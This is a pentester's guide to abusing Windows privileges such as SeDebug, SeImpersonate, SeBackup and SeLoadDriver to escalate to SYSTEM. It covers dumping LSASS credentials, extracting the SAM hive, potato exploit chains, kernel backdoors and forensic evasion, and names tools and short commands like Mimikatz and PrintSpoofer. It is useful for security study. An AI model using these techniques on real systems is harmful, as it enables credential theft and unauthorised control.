Windows Privileges:
Understanding Windows privileges is crucial when targeting local escalation, persistence, and impersonation on Windows systems. This guide breaks down the core privileges in Windows, how they affect security, and how pentesters can abuse them to move from user to SYSTEM — or better.
What Are Windows Privileges?
Privileges are specific rights assigned to users or groups that allow them to perform system-level actions.
- Unlike permissions (which are object-specific), privileges apply to the system as a whole.
- They’re managed through Group Policy and stored in each user’s access token.
- To view your current privileges:
whoami /priv
Each privilege has a name (e.g., SeDebugPrivilege) and a state:
- Enabled
- Disabled
- Removed
Most Critical Privileges for Pentesters
1. SeDebugPrivilege
- Allows: Attaching to and manipulating any process (even SYSTEM)
- Abuse: Dump credentials, steal tokens, manipulate processes
- Tools: Mimikatz, Process Hacker, PowerShell
- Enable:
mimikatz privilege::debug - Privilege Escalation: Token theft, LSASS dumping
2. SeImpersonatePrivilege
- Allows: Impersonating any token passed to the process
- Abuse: Token impersonation,
PrintSpoofer, Potato exploits - Key in: SERVICE exploitation and local privilege escalation
- Check:
whoami /privshould show it as enabled
3. SeAssignPrimaryTokenPrivilege
- Allows: Assigning tokens to new processes
- Abuse: Combine with
SeImpersonatePrivilegefor SYSTEM shell - Used in: Custom payloads, scripting abuse
4. SeTcbPrivilege (Act as part of the OS)
- Very powerful, allows deep OS integration
- Rarely assigned, typically to services
- Used for: Trusted logon sessions, dangerous if misconfigured
5. SeBackupPrivilege
- Allows: Reading any file regardless of ACLs
- Abuse: Access sensitive files like SAM, SYSTEM, registry hives
- Tools:
reg save,vssadmin, PowerShell
6. SeRestorePrivilege
- Allows: Writing to any file, restoring backups
- Abuse: Overwrite protected files, modify registry hives
- Combined with: SeBackup for full file control
7. SeTakeOwnershipPrivilege
- Allows: Taking ownership of any securable object
- Abuse: Take ownership of critical files or registry keys, change permissions
- Command:
takeown /F C:\targetfile
8. SeLoadDriverPrivilege
- Allows: Loading unsigned drivers (Ring 0)
- Abuse: Install kernel-mode backdoors or rootkits
- Warning: Often causes blue screens if misused
9. SeCreateTokenPrivilege
- Allows: Creating tokens manually
- Very rare, but extremely dangerous
- Used in: Custom token crafting (advanced persistence)
10. SeManageVolumePrivilege
- Allows: Defragmentation, raw disk access
- Abuse: Read/write raw disk sectors, bypass filesystem protections
- Used in: Forensic evasion, data hiding
Privilege Summary Table
| Privilege | Abuse Potential | Typical Use/Tool |
|---|---|---|
SeDebugPrivilege | Token theft, LSASS dump | Mimikatz, Proc Explorer |
SeImpersonatePrivilege | SYSTEM shell, Potato chain | PrintSpoofer, JuicyPotato |
SeAssignPrimaryToken | Shell injection | Custom scripts, API abuse |
SeTcbPrivilege | Full OS control | Rarely exploitable, but deadly |
SeBackupPrivilege | Read everything | reg save, vssadmin, PowerShell |
SeRestorePrivilege | Overwrite protected files | reg restore, backdoor implantation |
SeTakeOwnershipPrivilege | Take file control | takeown, icacls |
SeLoadDriverPrivilege | Kernel-level backdoors | Manual driver loading |
SeCreateTokenPrivilege | Craft any token | Manual or advanced attack tools |
SeManageVolumePrivilege | Raw disk access | Disk sector read/write, stealth ops |
Tools to Enumerate and Abuse Privileges
Enumeration
whoami /privGet-TokenPrivs.ps1(PowerView)Seatbelt.exe—Seatbelt -group=allaccesschk.exe -p user
Abuse & Exploitation
mimikatz privilege::debugPrintSpoofer.exeJuicyPotato.exe,RoguePotato.exe,SweetPotato.exe- Custom PowerShell/C# scripts
Common Escalation Paths via Privileges
SeImpersonate + SeAssignPrimaryToken
- Classic potato exploit chain → SYSTEM
SeDebugPrivilege
- Inject into SYSTEM process → Dump creds
SeBackup + SeRestore
- Extract
SAMandSYSTEM→ Crack passwords offline
SeTakeOwnership
- Modify registry keys or service binary ACLs
SeCreateToken
- Craft a token → Spawn SYSTEM shell (very rare, but powerful)
Pentesting Tips
- Always check your current privileges (
whoami /priv) - Look for service accounts with high privileges
- Use
accesschk.exeto find weak file/service permissions - Combine privileges with token abuse or service misconfigurations
- Build persistence by escalating and modifying privileges
Final Thoughts
Privileges are quiet but deadly. Most users never notice them — but if you do, and you know how to abuse them, they become one of your sharpest weapons on Windows.
Whether you’re targeting local escalation, persistence, or impersonation, map out your privileges early and plan your attacks accordingly. Like tokens, they’re part of the Windows soul — and they’re yours to master.